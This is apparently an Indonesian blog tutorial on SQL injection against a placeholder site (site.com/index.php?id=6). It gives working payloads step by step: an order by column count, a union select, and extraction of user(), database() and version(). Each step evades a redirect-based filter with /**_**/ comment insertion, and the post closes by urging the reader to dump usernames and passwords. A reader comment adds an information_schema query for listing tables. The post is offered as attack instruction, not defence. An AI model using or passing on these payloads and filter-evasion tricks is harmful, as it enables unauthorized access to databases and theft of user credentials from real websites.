Bypassing Sql Injection Redirect
Mungkin kalian saat ini sedang mengalami hal seperti ini? Oke mari kita selesaikan problemnya.
Ok lanjut.
Gw udah punya target contoh,
http://site.com/index.php?id=6
Lanjut menginjeksinya.
Sekarang kita akan mencari berapa jumlah column datasbase site tersebut dengan menambahkan perintah order by, tambahkan tanda + untuk spasi. Jadi perintah lengkapnya seperti ini
http://site.com/index.php?id=6+order+by+1-- -
Tapi disini gw saat menambahkan perintah order+by malah site ke redirect. Oke kita bypass seperti ini,
order/**_**/by 1-- - [bypass done]
Setelah bypass berhasil, lalu ganti angka 1 ke angka 2 dan seterusnya sampai menemukan error.
Disini gw menemukan errornya diangka ke 5, berarti jumlah column database ada 4.
Lanjut.
Sekarang masukan perintah union select, ganti order+by dengan union+select+1,2,3,4-- - dan sebelum angka dibelakang url tersebut tambahkan tanda -
Jadi perintah lengkapnya seperi ini,
http://site.com/index.php?id=-6+union+select+1,2,3,4-- -
Lagi-lagi setelah menganti perintah order+by ke perintah union+select site ke redirect, hmmm mari kita bypass
union/**_**/select 1,2,3,4-- - [bypass done]
Setelah bypass sukses, maka nanti akan mendapatkan sebuah angka, dan gw disini dapat angka 2.
Lanjut.
Sekarang coba kita lihat user, database, dan version site tersebut, dengan perintah seperti berikut ini
http://site.com/index.php?id=-6 union/**_**/select 1,user(),0x3a,database(),0x3a,version(),3,4-- -
Hmm ternyata kena redirect lagi, kita bypass lagi seperti berikut ini
user/**_**/(),database/**_**/(),version/**_**/() [bypass done]
Selanjutnya tinggal didump username dan passwordnya.
Sekian dari gw dan semoga bermanfaat.
how to dump tables ???
ReplyDeleteThe way is like this group_concat(table_name) and at the end of the number before the sign - input command like this
Deletefrom+information_schema.tables+where+table_schema=database()